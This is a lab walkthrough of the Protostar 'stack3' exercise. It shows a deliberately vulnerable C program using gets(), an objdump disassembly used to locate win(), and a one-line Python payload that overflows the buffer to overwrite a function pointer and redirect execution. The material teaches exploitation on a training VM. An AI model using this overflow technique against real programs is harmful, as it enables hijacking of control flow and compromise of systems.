Protostar vm, stack3

protostar

Here is the source of the vulnerable program :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

This exercicce is a bit diffferent. We need to change the flow to the program : when the program calls the fp function, it has to be redirected to the win function.

In order to do that we need to see where the win function is stored using objdump for example (probably not the best option) :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
user@protostar:/opt/protostar/bin$ objdump -d stack3

stack3:     file format elf32-i386


Disassembly of section .init:

080482e0 <_init>:
 80482e0: 55                    push   %ebp
 80482e1: 89 e5                 mov    %esp,%ebp
 80482e3: 53                    push   %ebx
 80482e4: 83 ec 04              sub    $0x4,%esp
 80482e7: e8 00 00 00 00        call   80482ec <_init+0xc>
 80482ec: 5b                    pop    %ebx
 80482ed: 81 c3 90 13 00 00     add    $0x1390,%ebx
 80482f3: 8b 93 fc ff ff ff     mov    -0x4(%ebx),%edx
 80482f9: 85 d2                 test   %edx,%edx
 80482fb: 74 05                 je     8048302 <_init+0x22>
 80482fd: e8 1e 00 00 00        call   8048320 <__gmon_start__@plt>
 8048302: e8 f9 00 00 00        call   8048400 <frame_dummy>
 8048307: e8 e4 01 00 00        call   80484f0 <__do_global_ctors_aux>
 804830c: 58                    pop    %eax
 804830d: 5b                    pop    %ebx
 804830e: c9                    leave  
 804830f: c3                    ret    

Disassembly of section .plt:

08048310 <__gmon_start__@plt-0x10>:
 8048310: ff 35 80 96 04 08     pushl  0x8049680
 8048316: ff 25 84 96 04 08     jmp    *0x8049684
 804831c: 00 00                 add    %al,(%eax)
  ...

08048320 <__gmon_start__@plt>:
 8048320: ff 25 88 96 04 08     jmp    *0x8049688
 8048326: 68 00 00 00 00        push   $0x0
 804832b: e9 e0 ff ff ff        jmp    8048310 <_init+0x30>

08048330 <gets@plt>:
 8048330: ff 25 8c 96 04 08     jmp    *0x804968c
 8048336: 68 08 00 00 00        push   $0x8
 804833b: e9 d0 ff ff ff        jmp    8048310 <_init+0x30>

08048340 <__libc_start_main@plt>:
 8048340: ff 25 90 96 04 08     jmp    *0x8049690
 8048346: 68 10 00 00 00        push   $0x10
 804834b: e9 c0 ff ff ff        jmp    8048310 <_init+0x30>

08048350 <printf@plt>:
 8048350: ff 25 94 96 04 08     jmp    *0x8049694
 8048356: 68 18 00 00 00        push   $0x18
 804835b: e9 b0 ff ff ff        jmp    8048310 <_init+0x30>

08048360 <puts@plt>:
 8048360: ff 25 98 96 04 08     jmp    *0x8049698
 8048366: 68 20 00 00 00        push   $0x20
 804836b: e9 a0 ff ff ff        jmp    8048310 <_init+0x30>

Disassembly of section .text:

08048370 <_start>:
 8048370: 31 ed                 xor    %ebp,%ebp
 8048372: 5e                    pop    %esi
 8048373: 89 e1                 mov    %esp,%ecx
 8048375: 83 e4 f0              and    $0xfffffff0,%esp
 8048378: 50                    push   %eax
 8048379: 54                    push   %esp
 804837a: 52                    push   %edx
 804837b: 68 80 84 04 08        push   $0x8048480
 8048380: 68 90 84 04 08        push   $0x8048490
 8048385: 51                    push   %ecx
 8048386: 56                    push   %esi
 8048387: 68 38 84 04 08        push   $0x8048438
 804838c: e8 af ff ff ff        call   8048340 <__libc_start_main@plt>
 8048391: f4                    hlt    
 8048392: 90                    nop
 8048393: 90                    nop
 8048394: 90                    nop
 8048395: 90                    nop
 8048396: 90                    nop
 8048397: 90                    nop
 8048398: 90                    nop
 8048399: 90                    nop
 804839a: 90                    nop
 804839b: 90                    nop
 804839c: 90                    nop
 804839d: 90                    nop
 804839e: 90                    nop
 804839f: 90                    nop

080483a0 <__do_global_dtors_aux>:
 80483a0: 55                    push   %ebp
 80483a1: 89 e5                 mov    %esp,%ebp
 80483a3: 53                    push   %ebx
 80483a4: 83 ec 04              sub    $0x4,%esp
 80483a7: 80 3d a4 96 04 08 00  cmpb   $0x0,0x80496a4
 80483ae: 75 3f                 jne    80483ef <__do_global_dtors_aux+0x4f>
 80483b0: a1 a8 96 04 08        mov    0x80496a8,%eax
 80483b5: bb a0 95 04 08        mov    $0x80495a0,%ebx
 80483ba: 81 eb 9c 95 04 08     sub    $0x804959c,%ebx
 80483c0: c1 fb 02              sar    $0x2,%ebx
 80483c3: 83 eb 01              sub    $0x1,%ebx
 80483c6: 39 d8                 cmp    %ebx,%eax
 80483c8: 73 1e                 jae    80483e8 <__do_global_dtors_aux+0x48>
 80483ca: 8d b6 00 00 00 00     lea    0x0(%esi),%esi
 80483d0: 83 c0 01              add    $0x1,%eax
 80483d3: a3 a8 96 04 08        mov    %eax,0x80496a8
 80483d8: ff 14 85 9c 95 04 08  call   *0x804959c(,%eax,4)
 80483df: a1 a8 96 04 08        mov    0x80496a8,%eax
 80483e4: 39 d8                 cmp    %ebx,%eax
 80483e6: 72 e8                 jb     80483d0 <__do_global_dtors_aux+0x30>
 80483e8: c6 05 a4 96 04 08 01  movb   $0x1,0x80496a4
 80483ef: 83 c4 04              add    $0x4,%esp
 80483f2: 5b                    pop    %ebx
 80483f3: 5d                    pop    %ebp
 80483f4: c3                    ret    
 80483f5: 8d 74 26 00           lea    0x0(%esi,%eiz,1),%esi
 80483f9: 8d bc 27 00 00 00 00  lea    0x0(%edi,%eiz,1),%edi

08048400 <frame_dummy>:
 8048400: 55                    push   %ebp
 8048401: 89 e5                 mov    %esp,%ebp
 8048403: 83 ec 18              sub    $0x18,%esp
 8048406: a1 a4 95 04 08        mov    0x80495a4,%eax
 804840b: 85 c0                 test   %eax,%eax
 804840d: 74 12                 je     8048421 <frame_dummy+0x21>
 804840f: b8 00 00 00 00        mov    $0x0,%eax
 8048414: 85 c0                 test   %eax,%eax
 8048416: 74 09                 je     8048421 <frame_dummy+0x21>
 8048418: c7 04 24 a4 95 04 08  movl   $0x80495a4,(%esp)
 804841f: ff d0                 call   *%eax
 8048421: c9                    leave  
 8048422: c3                    ret    
 8048423: 90                    nop

08048424 <win>:
 8048424: 55                    push   %ebp
 8048425: 89 e5                 mov    %esp,%ebp
 8048427: 83 ec 18              sub    $0x18,%esp
 804842a: c7 04 24 40 85 04 08  movl   $0x8048540,(%esp)
 8048431: e8 2a ff ff ff        call   8048360 <puts@plt>
 8048436: c9                    leave  
 8048437: c3                    ret    

08048438 <main>:
 8048438: 55                    push   %ebp
 8048439: 89 e5                 mov    %esp,%ebp
 804843b: 83 e4 f0              and    $0xfffffff0,%esp
 804843e: 83 ec 60              sub    $0x60,%esp
 8048441: c7 44 24 5c 00 00 00  movl   $0x0,0x5c(%esp)
 8048448: 00 
 8048449: 8d 44 24 1c           lea    0x1c(%esp),%eax
 804844d: 89 04 24              mov    %eax,(%esp)
 8048450: e8 db fe ff ff        call   8048330 <gets@plt>
 8048455: 83 7c 24 5c 00        cmpl   $0x0,0x5c(%esp)
 804845a: 74 1b                 je     8048477 <main+0x3f>
 804845c: b8 60 85 04 08        mov    $0x8048560,%eax
 8048461: 8b 54 24 5c           mov    0x5c(%esp),%edx
 8048465: 89 54 24 04           mov    %edx,0x4(%esp)
 8048469: 89 04 24              mov    %eax,(%esp)
 804846c: e8 df fe ff ff        call   8048350 <printf@plt>
 8048471: 8b 44 24 5c           mov    0x5c(%esp),%eax
 8048475: ff d0                 call   *%eax
 8048477: c9                    leave  
 8048478: c3                    ret    
 8048479: 90                    nop
 804847a: 90                    nop
 804847b: 90                    nop
 804847c: 90                    nop
 804847d: 90                    nop
 804847e: 90                    nop
 804847f: 90                    nop

08048480 <__libc_csu_fini>:
 8048480: 55                    push   %ebp
 8048481: 89 e5                 mov    %esp,%ebp
 8048483: 5d                    pop    %ebp
 8048484: c3                    ret    
 8048485: 8d 74 26 00           lea    0x0(%esi,%eiz,1),%esi
 8048489: 8d bc 27 00 00 00 00  lea    0x0(%edi,%eiz,1),%edi

08048490 <__libc_csu_init>:
 8048490: 55                    push   %ebp
 8048491: 89 e5                 mov    %esp,%ebp
 8048493: 57                    push   %edi
 8048494: 56                    push   %esi
 8048495: 53                    push   %ebx
 8048496: e8 4f 00 00 00        call   80484ea <__i686.get_pc_thunk.bx>
 804849b: 81 c3 e1 11 00 00     add    $0x11e1,%ebx
 80484a1: 83 ec 1c              sub    $0x1c,%esp
 80484a4: e8 37 fe ff ff        call   80482e0 <_init>
 80484a9: 8d bb 18 ff ff ff     lea    -0xe8(%ebx),%edi
 80484af: 8d 83 18 ff ff ff     lea    -0xe8(%ebx),%eax
 80484b5: 29 c7                 sub    %eax,%edi
 80484b7: c1 ff 02              sar    $0x2,%edi
 80484ba: 85 ff                 test   %edi,%edi
 80484bc: 74 24                 je     80484e2 <__libc_csu_init+0x52>
 80484be: 31 f6                 xor    %esi,%esi
 80484c0: 8b 45 10              mov    0x10(%ebp),%eax
 80484c3: 89 44 24 08           mov    %eax,0x8(%esp)
 80484c7: 8b 45 0c              mov    0xc(%ebp),%eax
 80484ca: 89 44 24 04           mov    %eax,0x4(%esp)
 80484ce: 8b 45 08              mov    0x8(%ebp),%eax
 80484d1: 89 04 24              mov    %eax,(%esp)
 80484d4: ff 94 b3 18 ff ff ff  call   *-0xe8(%ebx,%esi,4)
 80484db: 83 c6 01              add    $0x1,%esi
 80484de: 39 fe                 cmp    %edi,%esi
 80484e0: 72 de                 jb     80484c0 <__libc_csu_init+0x30>
 80484e2: 83 c4 1c              add    $0x1c,%esp
 80484e5: 5b                    pop    %ebx
 80484e6: 5e                    pop    %esi
 80484e7: 5f                    pop    %edi
 80484e8: 5d                    pop    %ebp
 80484e9: c3                    ret    

080484ea <__i686.get_pc_thunk.bx>:
 80484ea: 8b 1c 24              mov    (%esp),%ebx
 80484ed: c3                    ret    
 80484ee: 90                    nop
 80484ef: 90                    nop

080484f0 <__do_global_ctors_aux>:
 80484f0: 55                    push   %ebp
 80484f1: 89 e5                 mov    %esp,%ebp
 80484f3: 53                    push   %ebx
 80484f4: 83 ec 04              sub    $0x4,%esp
 80484f7: a1 94 95 04 08        mov    0x8049594,%eax
 80484fc: 83 f8 ff              cmp    $0xffffffff,%eax
 80484ff: 74 13                 je     8048514 <__do_global_ctors_aux+0x24>
 8048501: bb 94 95 04 08        mov    $0x8049594,%ebx
 8048506: 66 90                 xchg   %ax,%ax
 8048508: 83 eb 04              sub    $0x4,%ebx
 804850b: ff d0                 call   *%eax
 804850d: 8b 03                 mov    (%ebx),%eax
 804850f: 83 f8 ff              cmp    $0xffffffff,%eax
 8048512: 75 f4                 jne    8048508 <__do_global_ctors_aux+0x18>
 8048514: 83 c4 04              add    $0x4,%esp
 8048517: 5b                    pop    %ebx
 8048518: 5d                    pop    %ebp
 8048519: c3                    ret    
 804851a: 90                    nop
 804851b: 90                    nop

Disassembly of section .fini:

0804851c <_fini>:
 804851c: 55                    push   %ebp
 804851d: 89 e5                 mov    %esp,%ebp
 804851f: 53                    push   %ebx
 8048520: 83 ec 04              sub    $0x4,%esp
 8048523: e8 00 00 00 00        call   8048528 <_fini+0xc>
 8048528: 5b                    pop    %ebx
 8048529: 81 c3 54 11 00 00     add    $0x1154,%ebx
 804852f: e8 6c fe ff ff        call   80483a0 <__do_global_dtors_aux>
 8048534: 59                    pop    %ecx
 8048535: 5b                    pop    %ebx
 8048536: c9                    leave  
 8048537: c3                    ret

here we can see the adress of the function : 08048424

Let’s test that :

1
2
3
user@protostar:/opt/protostar/bin$ py -c 'print 64*"a"+"\x24\x84\x04\x08"' | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed